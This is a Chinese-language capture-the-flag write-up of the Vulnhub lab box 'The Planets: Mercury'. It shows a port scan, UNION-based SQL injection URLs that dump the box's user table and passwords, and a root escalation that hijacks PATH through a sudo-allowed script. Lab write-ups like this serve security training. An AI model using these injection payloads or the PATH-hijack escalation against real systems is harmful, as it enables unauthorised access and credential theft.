靶机描述

Difficulty: EasyMercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com

下载 https://www.vulnhub.com/entry/the-planets-mercury,544/

清单

  • 信息搜集

    • netdiscover
    • nmap

  • 利用

    • sql注入

  • 提权

    • sudo

信息搜集

靶机IP

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5uRAiFrP-1601208030462)(http://do.yutian233.xyz/image-20200927194449462.png)]

端口扫描

nmap -sS -sV -p- 192.168.0.112

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2

8080

由python 搭建

当访问时 http://192.168.0.112:8080/1

可以看出给出了目录 mercuryfacts

mercuryfacts

存在sql注入

http://192.168.0.112:8080/mercuryfacts/88888  union select group_concat(table_name) from information_schema.tables where table_schema=database()
(('facts,users',),)http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(column_name) from information_schema.columns where table_name='users'(('id,password,username',),)http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(id,password,username) from users
(('1johnny1987john,2lovemykids111laura,3lovemybeer111sam,4mercuryisthesizeof0.056Earthswebmaster',),)

使用 webmaster mercuryisthesizeof0.056Earths 来登录

webmaster

拿到shell 来到 notes.txt

得到用户 linuxmaster 用户的密码

linuxmaster

提权方法来自

ln -s /bin/vi tail
export PATH=.:$PATH
sudo -u root --preserve-env=PATH /usr/bin/check_syslog.sh

:/bin/bash

root

vulnhub-Mercury相关推荐

  1. vulnhub靶场——THE PLANETS: MERCURY

    THE PLANETS:MECURY 准备 攻击机: kali 靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段 下载连接: https://www.vulnhub ...

  2. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury

    Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...

  3. 【Vulnhub靶场】Earth

    目录 前言 一.信息收集 0x00 arp-scan扫描 0x01 nmap扫描 二.目录扫描 0x00 dirb扫描 0x01 XOR解密 三.漏洞利用 0x00 命令执行漏洞 0x01 反弹she ...

  4. vulnhub Earth:解题思路

    靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough ...

  5. vulnhub-The Planets: Mercury

    The Planets: Mercury ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 ( ...

  6. 靶机渗透练习82-The Planets:Mercury

    靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercur ...

  7. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus

    Vulnhub靶机The Planets:Venus渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH ...

  8. Mercury的三件“利器”

    Mercury的三件"利器" "工欲善其事,必先利其器",测试软件的选择对整个系统测试工作的顺利实施是至关重要.但是,在众多的测试厂商中海关总署为什么选择了Me ...

  9. Mercury:唯品会全链路应用监控系统解决方案详解

    姚捷,唯品会平台架构部高级架构师,加入唯品会前有超过 10 年的金融/保险互联网技术架构和团队管理经验,擅长以产品思维设计和构建系统.现专注于互联网基础架构,负责唯品会全链路监控/分析平台的开发,管理 ...

  10. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

最新文章

  1. sap系统搭建教程_Nios ii最小系统搭建教程
  2. Oracle数据类型与.NET中的对应关系
  3. mysql8 2058_SQLyog连接MySQL8.0及以上版本出现2058错误解决方案
  4. The .NET Core runtime can be found at:(Windows)
  5. rtc芯片rx8025t在linux 3.10下的的驱动
  6. 数据结构(一):数组
  7. 最好用的WIN7WIN10激活工具
  8. RS232通信协议详解
  9. libnet发包java语言_Net-speeder多倍发包脚本
  10. Ubuntu16.04安装ftp配置
  11. 44道javaScript变态题(上)
  12. 挖掘企业数据矿产,袋鼠云数栈(DTinsight)助力企业搭建数据中台
  13. 【算力网络】算力网络的技术创新——绿色与安全关键技术
  14. 【云计算的1024种玩法】一.半小时轻松搭建属于自己的Discuz论坛
  15. 走进诺奖大师系列:科斯(Ronald H.Coase)
  16. flash播放器插件与flash播放器的区别
  17. 企业微信监控服务器数据接入,如何在alertmanager报警中添加企业微信监控报警
  18. 哈工大计算机学硕专硕分开排名,哈工大计算机考研经验谈
  19. Jinja2中怎么使用宏?
  20. html地图根据坐标定位,百度地图js根据经纬度定位和拖动定位点

热门文章

  1. 收高德仍无解,阿里还有三步棋
  2. android root 缺少busybox,手机安装不了Busybox已经root安装后显示让更换路径..
  3. Gstreamer编译
  4. Python语言是解释性语言还是编译性语言?
  5. centos8时间比实际时间快8小时
  6. BZOJ 4668: 冷战 并查集
  7. Golang-go mod download 出现 dial tcp 34.64.4.17:443: i/o timeout
  8. 红米airdots掉了怎么查找_戒网瘾神器红米路由器ac2100
  9. 微商怎么在百度引流?微商百度引流怎么做?
  10. ANTLR4入门(二):图示说明eclipse Antlr4IDE插件的安装及语法测试过程